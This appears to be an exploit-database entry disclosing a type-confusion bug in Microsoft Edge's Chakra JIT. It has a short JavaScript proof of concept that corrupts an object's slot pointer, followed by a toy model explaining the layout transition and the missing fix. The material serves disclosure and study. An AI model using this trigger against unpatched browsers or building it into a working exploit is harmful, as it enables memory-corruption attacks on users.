
Microsoft Edge Chakra - 'InlineArrayPush' Type Confusion
27 lines
No EOL
849 B
JavaScript
/*
In Chakra, if you add a numeric property to an object that has inlined properties, the object starts a transition to a new type in which the space occupied by some of the previously inlined properties is reused for the pointer to the property slots and the pointer to the object array that stores numeric properties. For this reason, when the JIT optimizes an InlineArrayPush instruction that might start such a transition, it must kill the corresponding type symbols to prevent type confusion. It doesn't, so type confusion results.

PoC:
*/

function opt(a, b) {
    a.b = 2;        // inline property store; establishes a's type for the JIT
    b.push(0);      // InlineArrayPush: when b === a this adds a numeric property and starts a's type transition
    a.a = 0x1234;   // store still uses the pre-transition inline layout because the type symbol was not killed
}

function main() {
    // Make push available on plain objects so b.push is compiled as InlineArrayPush
    Object.prototype.push = Array.prototype.push;

    // Warm up opt with distinct objects so it is JIT-compiled without ever observing a transition
    for (let i = 0; i < 1000; i++) {
        let a = {a: 1, b: 2};
        opt(a, {});
    }

    // Pass the same object as both parameters so the push transitions a in the middle of the function
    let o = {a: 1, b: 2};
    opt(o, o);

    print(o.a);     // ch shell print; with correct type tracking this reads 0x1234
}

main();
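The layout transition and the stale JIT assumption described in the header comment, as an added toy model in JavaScript (an illustration written for this page, not Chakra's code and not part of the PoC): ToyObject, jitOpt and run are invented names, the slot and pointer values are constructed, and the killTypeSymbols flag models the fix the text calls for, i.e. killing the type symbols after a push that may start a transition.

```javascript
// Toy model of the layout transition and the JIT's stale type assumption. Added
// illustration, not Chakra's code: ToyObject, jitOpt and run are invented names.
class ToyObject {
  constructor(a, b) {
    this.typeId = "T_inline";     // properties live in the two inline slots
    this.slots = [a, b];          // inline slot 0 holds a, inline slot 1 holds b
    this.auxSlots = null;         // out-of-line property slots after transition
    this.objectArray = null;      // storage for numeric properties after transition
  }
  // Adding the first numeric property starts the type transition: the inline slot
  // area is reused for the auxSlots and objectArray pointers.
  pushNumeric(v) {
    if (this.typeId === "T_inline") {
      this.auxSlots = this.slots.slice();                   // a and b move out of line
      this.objectArray = [];
      this.slots = ["<auxSlotsPtr>", "<objectArrayPtr>"];   // same bytes, new meaning
      this.typeId = "T_transitioned";
    }
    this.objectArray.push(v);
  }
}

// JIT'd body of opt(a, b). killTypeSymbols=true models the fix the text asks for:
// after an InlineArrayPush that may transition, discard what is known about a's type.
function jitOpt(a, b, killTypeSymbols) {
  if (a.typeId !== "T_inline") return "bailout";   // entry type check: type symbol for a
  a.slots[1] = 2;                                  // a.b = 2: inline store, valid here
  b.pushNumeric(0);                                // b.push(0): transitions a when b === a
  if (killTypeSymbols && a.typeId !== "T_inline") return "bailout"; // symbol killed, re-check
  a.slots[0] = 0x1234;                             // a.a = 0x1234 with the stale inline layout
  return "ok";
}

// Runs the aliased call opt(o, o) and reports whether the inline store for a.a
// landed on the auxSlots pointer instead of on property a.
function run(killTypeSymbols) {
  const o = new ToyObject(1, 2);
  const result = jitOpt(o, o, killTypeSymbols);
  const pointerClobbered = o.typeId === "T_transitioned" && o.slots[0] !== "<auxSlotsPtr>";
  const a = o.auxSlots ? o.auxSlots[0] : o.slots[0];   // where property a actually lives now
  return { result, pointerClobbered, a };
}

console.log(run(false));  // vulnerable JIT: { result: 'ok', pointerClobbered: true, a: 1 }
console.log(run(true));   // fixed JIT:      { result: 'bailout', pointerClobbered: false, a: 1 }
```

In the model the unfixed path writes 0x1234 over the slot that now holds the auxSlots pointer while property a keeps its old value, which is the confusion the real PoC triggers; the fixed path re-checks the type and bails out before that store.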